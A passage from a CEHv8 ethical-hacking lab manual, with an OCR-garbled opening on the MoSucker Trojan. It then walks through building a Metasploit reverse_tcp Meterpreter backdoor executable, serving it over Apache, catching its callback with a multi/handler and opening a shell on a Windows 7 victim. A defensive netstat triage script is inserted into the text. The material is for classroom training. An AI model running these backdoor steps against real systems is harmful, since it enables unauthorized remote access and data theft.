  • 91. Module 06 - Trojans and Backdoors '‫׳‬A bout _ | I& T ools dem on stra te d in th is lab are a va ilab le in D:CEHToolsCEHv8 M odule 06 Trojans and B ackdoors FIGURE 10 7 settingserver options .1 : 22. Y o u can also access the v ic tim ’s machine rem otely by clicking Live ca p tu re 111 the le ft pane. 23. 1 1 the Live ca p tu re o p tion click S tart, w hich w ill open the remote desktop 1 o f a v ic tim ’s machine. ‫ ׳‬A b o u t' | 4288 1 Disconnect 1 Options ] s g 1 1 Misc stuff Information File related System Spy related Fun stuff I Fun stuff II Live capture Start Settings JI& _ ~x] Q make screenshot Make screenshot JPEG Quality: * • • • 20% 30% 40% 50% • • • O 60% 70% 80% 90% & oi£ FIGURE 10.18: start capturing 24. The remote desktop connection o l die v ic tim ’s machine is shown 111 die fo llo w in g tigiire. C EH Lab Manual Page 514 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  • 92. Module 06 - Trojans and Backdoors Remote administration mode sssei sssa&i RA mode options Resi2 windo-v to 4:3 e JPG Quality 1 Delay in ms | W W W V '▼ 1000 Send mouseclicks Send pressed keys Send mousemoves Autollpdate pics U Fullscreen FIGURE 10.19: capturingvictimm achine 25. Y o u can access tiles, m o d ify die files, and so on in dns mode. RA mode options r * Rem10te administration mode w *> Resize window to 4:31 W W 1 “ W ▼j I j Delay in ms | 1 ! JP G Quality 1 90% 1000 Send mouseclcks Send pressed Leys Send mDusemoves Autollpdate pics Fullscrccp J ____ ^ :T t- o w n .a c E K‫־‬ 1« C‫־־‬ f■ c* & Z Z ----- Crcre:5FHB ► * *‫י־יי־‬ ■ o ® 1• M 1 o; FIGURE 10.20: capturingvictimm achine 26. Similarly, you can access die details o f die v ic tim ’s machine by clicking die respective functions. L a b A n a ly s is Analyze and docum ent die results related to die lab exercise. G ive your opinion on your target’s security‫ ״‬postare and exposure through public and free inform ation. C EH Lab Manual Page 515 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: MoSucker
Information Collected/Objectives Achieved: Output: Record the screenshots of the victim's machine

Questions

1. Evaluate and examine various methods to connect to victims if they are in different cities or countries.

Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom [x] iLabs
Hack Windows 7 Using Metasploit

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Lab Scenario

Large companies are common targets for hackers and attackers of various kinds, and it is not uncommon for these companies to be actively monitoring traffic to and from their critical IT infrastructure. Based on the functionality of the Trojan, we can safely surmise that its intent is to open a backdoor on a compromised computer, allowing a remote attacker to monitor activity and steal information from that computer. Once installed inside a corporate network, the backdoor feature of the Trojan can also allow the attacker to use the initially compromised computer as a springboard to launch further forays into the rest of the infrastructure, meaning that the wealth of information that may be stolen could be far greater than that existing on a single machine.

A basic principle of all malicious programs is that they need the user's help to do damage to a computer. That is why Trojan horses try to deceive users by presenting themselves as something else, such as an email. Backdoor programs are used to gain unauthorized access to systems; hackers use backdoor software to gain access to a system so that they can send in malicious software to that particular system. A successful attack in which the hacker or attacker infects the target environment with a customized Trojan horse (backdoor) reveals the exploitable holes in the current security system.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Note: Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:

■ Creating a server and testing the network for attack
■ Attacking a network using a sample backdoor and monitoring the system activity

Lab Environment

To carry this out, you need:

■ A computer running Windows Server 2012
■ BackTrack 5 r3 running in a virtual machine
■ Windows 7 running in a virtual machine (victim machine)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Tasks

TASK 1: Create Server Connection

1. Start the BackTrack 5 virtual machine.

2. Open the terminal console by navigating to Applications -> BackTrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> msfconsole.

Note: Open your terminal (CTRL+ALT+T) and type msfvenom -h to view the available options for this tool.
FIGURE 11.1: Selecting msfconsole from Metasploit Framework

3. Type the following command in msfconsole and press Enter:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe

Note: This IP address (10.0.0.6) is the BackTrack machine's. These IP addresses may vary in your lab environment.

FIGURE 11.2: Creating Backdoor.exe

4. This command creates a Windows executable file named Backdoor.exe and saves it on the BackTrack 5 desktop.

Note: Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

FIGURE 11.3: Created Backdoor.exe file

5. Now you need to share Backdoor.exe with your victim machine (Windows 7) by following these steps:

6. Open a new BackTrack 5 terminal (CTRL+ALT+T), then run the command mkdir /var/www/share and press Enter to create a new directory named share.

FIGURE 11.4: Sharing the file

7. Change the mode of the share folder to 755 by entering the command chmod -R 755 /var/www/share/ and then pressing Enter.

FIGURE 11.5: Changing the mode of the share folder to 755

8. Change the ownership of that folder to www-data by entering the command chown -R www-data:www-data /var/www/share/ and then pressing Enter.

FIGURE 11.6: Changing the ownership of the folder

9. Type the command ls -la /var/www/ | grep share and then press Enter.

FIGURE 11.7: Sharing the Backdoor.exe file

10. The next step is to start the Apache server by typing the command service apache2 start in the terminal and then pressing Enter.

Note: If you do not have apache2 installed, run apt-get install apache2.

Note: To run the Apache web server, use the following command: cp /root/.msf4/data/exploits/* /var/www/share/

FIGURE 11.8: Starting Apache web server

11. Now that your Apache web server is running, copy the Backdoor.exe file into the share folder. Type the following command and press Enter:

cp /root/Desktop/Backdoor.exe /var/www/share/

FIGURE 11.9: Running Apache web server

12. Now go to the Windows 7 virtual machine, open Firefox or any web browser, type the URL http://10.0.0.6/share/ in the URL field, and then press Enter. Note: Here 10.0.0.6 is the IP address of BackTrack; it may vary in your lab environment.

FIGURE 11.10: Firefox web browser showing the index of /share with Backdoor.exe

13. Download the Backdoor.exe file in the Windows 7 virtual machine and save it on the desktop.

FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the BackTrack machine.

15. Open the Metasploit console. To create a handler for the connection from the victim machine (Windows 7), type the command use exploit/multi/handler and press Enter.

Note: The exploit will be saved in the /root/.msf4/data/exploits/ folder.

FIGURE 11.12: Exploit the victim machine

16. To use the reverse TCP payload, type the command set payload windows/meterpreter/reverse_tcp and press Enter.

FIGURE 11.13: Setting up the reverse TCP payload

17. To set the local IP address that will catch the reverse connection, type the command set lhost 10.0.0.6 (the BackTrack IP address) and press Enter.

FIGURE 11.14: Setting the local IP address

18. To start the handler, type the command exploit -j -z and press Enter.

FIGURE 11.15: Exploit the Windows 7 machine (the console reports "Started reverse handler on 10.0.0.6:4444")

19. Now switch to the victim machine (Windows 7) and double-click the Backdoor.exe file (already downloaded) to run it.

20. Switch back to the BackTrack machine; you will see the output shown in the following figure.

FIGURE 11.16: Exploit result on the Windows 7 machine (the console reports "Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.5:49458)")

Note: To interact with the available session, you can use sessions -i <session id>.

21. To interact with the available session, type the command sessions -i 1 and press Enter.

FIGURE 11.17: Creating the session

22. Enter the command shell, and press Enter.

FIGURE 11.18: Type the shell command

23. Type the dir command and press Enter. It shows all the directories present on the victim machine (Windows 7).

FIGURE 11.19: Check the directories of Windows 7
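Seen from the victim side, both labs leave the same kind of trace: a process running from a location no service should run from, holding a network connection. The following Python triage helper is an added example, not part of the lab manual; it joins constructed `netstat -ano` rows with a constructed PID-to-image-path map and flags a listener from an untrusted location (the MoSucker server.exe on port 4288) and an outbound connection from one (Backdoor.exe to 10.0.0.6:4444). Only the paths and ports are taken from the lab text; the PIDs and sample rows are made up.

```python
"""Victim-side triage helper, added as an example and not part of the CEH lab manual.
Joins `netstat -ano` rows with process image paths and flags the two patterns the
labs leave on the victim: a Trojan server listening on an unusual port from a
non-system location (MoSucker server.exe on 4288) and a user-launched executable
holding an outbound connection to a handler (Backdoor.exe to 10.0.0.6:4444).
All rows and PIDs below are constructed; the paths and ports come from the lab text."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the column layout of `netstat -ano` on Windows.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       796
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4288           0.0.0.0:0              LISTENING       1844
  TCP    10.0.0.5:49458         10.0.0.6:4444          ESTABLISHED     3120
  TCP    10.0.0.5:49460         10.0.0.6:80            TIME_WAIT       0
  UDP    0.0.0.0:5355           *:*                                    1120
"""

# Constructed PID -> image path map, as `tasklist` or `wmic process` would report it.
PROCESS_PATHS: Dict[int, str] = {
    796: "C:\\Windows\\System32\\svchost.exe",
    4: "System",
    1844: "Z:\\CEHv8 Module 06 Trojans and Backdoors\\Trojans Types\\GUI Trojans\\MoSucker\\server.exe",
    3120: "C:\\Users\\Admin\\Desktop\\Backdoor.exe",
    1120: "C:\\Windows\\System32\\svchost.exe",
}

# Image locations expected for services and listeners; anything else (Desktop,
# Downloads, Temp, removable or mapped drives) is treated as untrusted here.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Default port of the Metasploit multi/handler used in the lab; a weak indicator on
# its own (a handler can listen anywhere), so it only adds context to a finding.
KNOWN_HANDLER_PORTS = {4444}


@dataclass
class Connection:
    proto: str
    local: str
    foreign: str
    state: str  # empty for UDP rows, which have no State column
    pid: int


@dataclass
class Finding:
    pid: int
    path: str
    reason: str


def parse_netstat(text: str) -> List[Connection]:
    """Parse `netstat -ano` output: TCP rows carry five columns, UDP rows four."""
    rows: List[Connection] = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # header, blank or unrelated line
        if parts[0] == "TCP" and len(parts) == 5:
            rows.append(Connection(parts[0], parts[1], parts[2], parts[3], int(parts[4])))
        elif parts[0] == "UDP" and len(parts) == 4:
            rows.append(Connection(parts[0], parts[1], parts[2], "", int(parts[3])))
    return rows


def port_of(addr: str) -> Optional[int]:
    """Port of 'host:port' (IPv6 '[::]:port' included); None for wildcards like '*:*'."""
    _host, sep, port = addr.rpartition(":")
    return int(port) if sep and port.isdigit() else None


def is_trusted_path(path: str) -> bool:
    return path == "System" or path.lower().startswith(TRUSTED_PREFIXES)


def triage(netstat_text: str, process_paths: Dict[int, str]) -> List[Finding]:
    """Flag listeners and established connections owned by images outside system paths."""
    findings: List[Finding] = []
    for conn in parse_netstat(netstat_text):
        path = process_paths.get(conn.pid)
        if conn.pid == 0 or path is None or is_trusted_path(path):
            continue  # kernel-owned, unknown, or expected location: nothing to report
        if conn.state == "LISTENING":
            reason = f"listener on port {port_of(conn.local)} from untrusted location"
        elif conn.state == "ESTABLISHED":
            rport = port_of(conn.foreign)
            reason = f"outbound connection to {conn.foreign} from untrusted location"
            if rport in KNOWN_HANDLER_PORTS:
                reason += f" (port {rport} is the default Metasploit handler port)"
        else:
            continue  # TIME_WAIT, SYN_SENT and UDP rows are not acted on here
        findings.append(Finding(conn.pid, path, reason))
    return findings
```

Running `triage(NETSTAT_SAMPLE, PROCESS_PATHS)` on the sample reports only PIDs 1844 and 3120; the svchost.exe listeners and the closed TIME_WAIT row are left alone, and the path rule fires even if the handler used a port other than 4444.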
Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit
Information Collected/Objectives Achieved: Output: Hack the Windows 7 machine directories

Internet Connection Required: [ ] Yes [x] No
Platform Supported: [x] Classroom [x] iLabs